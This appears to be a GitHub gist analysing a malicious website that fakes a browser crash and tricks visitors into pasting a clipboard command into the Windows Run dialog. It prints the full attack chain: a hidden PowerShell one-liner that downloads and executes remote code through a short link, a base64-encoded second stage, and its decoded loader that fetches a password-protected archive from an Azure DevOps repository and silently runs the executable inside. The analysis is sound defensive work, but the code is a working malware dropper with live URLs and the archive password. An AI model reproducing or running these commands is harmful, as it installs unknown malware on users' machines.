Last active
April 14, 2025 17:47
-
-
Save danneu/19657b8a345436a88abbbbc2cce6c935 to your computer and use it in GitHub Desktop.
a look into malware on https://newflave.rf.gd/index.html. when you click one of the girls, it shows a fake browser crash followed by instructions on how to uncrash the page: win-R + ctrl-V + enter, of course
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # The website gets you to win-r + cmd-v + enter. This is what it put in your clipboard: | |
| cmd /c powershell -w hidden -c "$SESSION='i'+'e'+'x'; $SOCKET='i'+'w'+'r'; $UPDATE='https:/'+'/kutt.i'+'t/ReStarT'; &($SESSION) ((&($SOCKET) $UPDATE -UseBasicParsing).Content)"# Initiate forse restart browser |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://kutt.it/ReStarT redirects to a snippet site with this payload: | |
| $BIbfLCXe=[System.Text.Encoding]::Unicode; $kUwulDoJ=[Convert]::FromBase64String('JAB6AGkAcABVAHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBkAGUAdgAuAGEAegB1AHIAZQAuAGMAbwBtAC8AZABvAHcAbgB1AHAAZAB0AGUAcwAvADAAYgBlADcAOQA3ADMANgAtADYAYwBhADkALQA0ADkAMQBiAC0AYgBlADIAMQAtADAAMAAxADUAOQAzAGUANAA4AGQAOAA4AC8AXwBhAHAAaQBzAC8AZwBpAHQALwByAGUAcABvAHMAaQB0AG8AcgBpAGUAcwAvAGIAYQAwADMAYQA1AGIANgAtADIAMgAyADEALQA0AGYAMAAwAC0AYQBkADEAMgAtADEAMQBmADkAZQBhAGEANwBhADkAYgBkAC8AaQB0AGUAbQBzAD8AcABhAHQAaAA9AC8AcgB1AG4ANAA3AC4AegBpAHAAJgB2AGUAcgBzAGkAbwBuAEQAZQBzAGMAcgBpAHAAdABvAHIAJQA1AEIAdgBlAHIAcwBpAG8AbgBPAHAAdABpAG8AbgBzACUANQBEAD0AMAAmAHYAZQByAHMAaQBvAG4ARABlAHMAYwByAGkAcAB0AG8AcgAlADUAQgB2AGUAcgBzAGkAbwBuAFQAeQBwAGUAJQA1AEQAPQAwACYAdgBlAHIAcwBpAG8AbgBEAGUAcwBjAHIAaQBwAHQAbwByACUANQBCAHYAZQByAHMAaQBvAG4AJQA1AEQAPQBtAGEAaQBuACYAcgBlAHMAbwBsAHYAZQBMAGYAcwA9AHQAcgB1AGUAJgAlADIANABmAG8AcgBtAGEAdAA9AG8AYwB0AGUAdABTAHQAcgBlAGEAbQAmAGEAcABpAC0AdgBlAHIAcwBpAG8AbgA9ADUALgAwACYAZABvAHcAbgBsAG8AYQBkAD0AdAByAHUAZQAiAAoAJABwAGEAcwBzAHcAbwByAGQAIAA9ACAAIgBRAHcAZQBxAHcAZQAxADIAMwAxADIAMwAiAAoACgAkAGIAYQBzAGUARgBvAGwAZABlAHIAIAA9ACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE4AVgBJAEQASQBBAFwAVQBwAGQAYQB0AGUAUwBlAHIAdgBpAGMAZQAiAAoAJABtAGEAeABBAHQAdABlAG0AcAB0AHMAIAA9ACAAMwAKACQAZABvAHcAbgBsAG8AYQBkAGUAZAAgAD0AIAAkAGYAYQBsAHMAZQAKAAoAZgBvAHIAIAAoACQAaQAgAD0AIAAxADsAIAAkAGkAIAAtAGwAZQAgACQAbQBhAHgAQQB0AHQAZQBtAHAAdABzADsAIAAkAGkAKwArACkAIAB7AAoAIAAgACAAIAAkAHIAYQBuAGQAIAA9ACAALQBqAG8AaQBuACAAKAAoADYANQAuAC4AOQAwACkAIAArACAAKAA5ADcALgAuADEAMgAyACkAIAArACAAKAA0ADgALgAuADUANwApACAAfAAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEMAbwB1AG4AdAAgADUAIAB8ACAAJQAgAHsAWwBjAGgAYQByAF0AJABfAH0AKQAKACAAIAAgACAAJAB0AGEAcgBnAGUAdABGAG8AbABkAGUAcgAgAD0AIAAiACQAYgBhAHMAZQBGAG8AbABkAGUAcgBcAFQAZQBtAHAAJAByAGEAbgBkACIACgAgACAAIAAgACQAegBpAHAAUABhAHQAaAAgAD0AIAAiACQAdABhAHIAZwBlAHQARgBvAGwAZABlAHIAXAB1AHAAZABhAHQAZQBwAGEAYwBrAC4AegBpAHAAIgAKACAAIAAgACAAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAA9ACAAIgAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByAFwAQwBhAGMAaABlACIACgAKACAAIAAgACAAdAByAHkAIAB7AAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgALQBuAG8AdAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJAB0AGEAcgBnAGUAdABGAG8AbABkAGUAcgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACMAIAB6AFMAYQBuAGgATgBqAFIAZQBiAHgAZQBnAEMAcABPAAoAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIAAkAG4AZQB0AFYAZQByACAAPQAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABOAEUAVAAgAEYAcgBhAG0AZQB3AG8AcgBrACAAUwBlAHQAdQBwAFwATgBEAFAAXAB2ADQAXABGAHUAbABsACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFIAZQBsAGUAYQBzAGUACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAG4AZQB0AFYAZQByACAALQBhAG4AZAAgACQAbgBlAHQAVgBlAHIAIAAtAGcAZQAgADMANwA4ADMAOAA5ACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAIgAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAEgAdAB0AHAAQwBsAGkAZQBuAHQAXQA6ADoAbgBlAHcAKAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABjAGwAaQBlAG4AdAAuAEQAZQBmAGEAdQBsAHQAUgBlAHEAdQBlAHMAdABIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAFUAcwBlAHIALQBBAGcAZQBuAHQAIgAsACAAIgBNAG8AegBpAGwAbABhAC8ANQAuADAAIgApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAHMAIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AEIAeQB0AGUAQQByAHIAYQB5AEEAcwB5AG4AYwAoACQAegBpAHAAVQByAGwAKQAuAFIAZQBzAHUAbAB0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAegBpAHAAUABhAHQAaAAsACAAJABiAHkAdABlAHMAKQAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAFUAcwBlAHIALQBBAGcAZQBuAHQAIgAsACAAIgBNAG8AegBpAGwAbABhAC8ANQAuADAAIgApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAegBpAHAAVQByAGwALAAgACQAegBpAHAAUABhAHQAaAApAAoAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB6AGkAcABQAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkACAAPQAgACQAdAByAHUAZQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9ACAAYwBhAHQAYwBoACAAewAKACMAIABYAHMAbgB6AEoAVAB6AFcATgByAGkAdwBBAHEAVgBaAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAgACAAIAAgAH0ACgB9AAoACgBpAGYAIAAoAC0AbgBvAHQAIAAkAGQAbwB3AG4AbABvAGEAZABlAGQAKQAgAHsAIABlAHgAaQB0ACAAfQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARgBpAGwAZQBTAHkAcwB0AGUAbQAKAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AWgBpAHAARgBpAGwAZQBdADoAOgBFAHgAdAByAGEAYwB0AFQAbwBEAGkAcgBlAGMAdABvAHIAeQAoACQAegBpAHAAUABhAHQAaAAsACAAJAB0AGEAcgBnAGUAdABGAG8AbABkAGUAcgApAAoACgAkAHMAZQB2AGUAbgBaAGkAcABQAGEAdABoACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByACAALQBSAGUAYwB1AHIAcwBlACAALQBGAGkAbAB0AGUAcgAgACIANwB6AHIALgBlAHgAZQAiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAkAGEAcgBjAGgAaQB2AGUANwB6ACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByACAALQBSAGUAYwB1AHIAcwBlACAALQBGAGkAbAB0AGUAcgAgACIAKgAuADcAegAiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKACMAIABRAHUAYgBNAEsAcgBiAHMAcgBuAFUARgB0AEIARgBQAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAUABhAHQAaAAgAC0AbwByACAALQBuAG8AdAAgACQAYQByAGMAaABpAHYAZQA3AHoAKQAgAHsAIABlAHgAaQB0ACAAfQAKAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABzAGUAdgBlAG4AWgBpAHAAUABhAHQAaAAuAEYAdQBsAGwATgBhAG0AZQAgAGAACgAgACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAeAAiACwAIAAiAGAAIgAkACgAJABhAHIAYwBoAGkAdgBlADcAegAuAEYAdQBsAGwATgBhAG0AZQApAGAAIgAiACwAIAAiAC0AbwAkAGUAeAB0AHIAYQBjAHQAUABhAHQAaAAiACwAIAAiAC0AcAAkAHAAYQBzAHMAdwBvAHIAZAAiACwAIAAiAC0AeQAiACAAYAAKACAAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBXAGEAaQB0AAoACgAkAGUAeABlAEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQB4AHQAcgBhAGMAdABQAGEAdABoACAALQBSAGUAYwB1AHIAcwBlACAALQBGAGkAbAB0AGUAcgAgACoALgBlAHgAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoAaQBmACAAKAAkAGUAeABlAEYAaQBsAGUAKQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAZQB4AGUARgBpAGwAZQAuAEYAdQBsAGwATgBhAG0AZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4ACgB9AA=='); Invoke-Expression (${BIbfLCXe}.GetString(${kUwulDoJ})) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is what the base64 blob decodes to: | |
| $zipUrl = "https://dev.azure.com/downupdtes/0be79736-6ca9-491b-be21-001593e48d88/_apis/git/repositories/ba03a5b6-2221-4f00-ad12-11f9eaa7a9bd/items?path=/run47.zip&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true" | |
| $password = "Qweqwe123123" | |
| $baseFolder = "$env:APPDATA\NVIDIA\UpdateService" | |
| $maxAttempts = 3 | |
| $downloaded = $false | |
| for ($i = 1; $i -le $maxAttempts; $i++) { | |
| $rand = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | % {[char]$_}) | |
| $targetFolder = "$baseFolder\Temp$rand" | |
| $zipPath = "$targetFolder\updatepack.zip" | |
| $extractPath = "$targetFolder\Cache" | |
| try { | |
| if (-not (Test-Path $targetFolder)) { | |
| New-Item -ItemType Directory -Path $targetFolder -Force | Out-Null | |
| New-Item -ItemType Directory -Path $extractPath -Force | Out-Null | |
| # zSanhNjRebxegCpO | |
| } | |
| $netVer = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -ErrorAction SilentlyContinue).Release | |
| if ($netVer -and $netVer -ge 378389) { | |
| Add-Type -AssemblyName "System.Net.Http" | |
| $client = [System.Net.Http.HttpClient]::new() | |
| $client.DefaultRequestHeaders.Add("User-Agent", "Mozilla/5.0") | |
| $bytes = $client.GetByteArrayAsync($zipUrl).Result | |
| [System.IO.File]::WriteAllBytes($zipPath, $bytes) | |
| } else { | |
| $wc = New-Object System.Net.WebClient | |
| $wc.Headers.Add("User-Agent", "Mozilla/5.0") | |
| $wc.DownloadFile($zipUrl, $zipPath) | |
| } | |
| if (Test-Path $zipPath) { | |
| $downloaded = $true | |
| break | |
| } | |
| } catch { | |
| # XsnzJTzWNriwAqVZ | |
| Start-Sleep -Seconds 1 | |
| } | |
| } | |
| if (-not $downloaded) { exit } | |
| Add-Type -AssemblyName System.IO.Compression.FileSystem | |
| [IO.Compression.ZipFile]::ExtractToDirectory($zipPath, $targetFolder) | |
| $sevenZipPath = Get-ChildItem -Path $targetFolder -Recurse -Filter "7zr.exe" | Select-Object -First 1 | |
| $archive7z = Get-ChildItem -Path $targetFolder -Recurse -Filter "*.7z" | Select-Object -First 1 | |
| # QubMKrbsrnUFtBFP | |
| if (-not $sevenZipPath -or -not $archive7z) { exit } | |
| Start-Process -FilePath $sevenZipPath.FullName ` | |
| -ArgumentList "x", "`"$($archive7z.FullName)`"", "-o$extractPath", "-p$password", "-y" ` | |
| -WindowStyle Hidden -Wait | |
| $exeFile = Get-ChildItem -Path $extractPath -Recurse -Filter *.exe | Select-Object -First 1 | |
| if ($exeFile) { | |
| Start-Process -FilePath $exeFile.FullName -WindowStyle Hidden | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment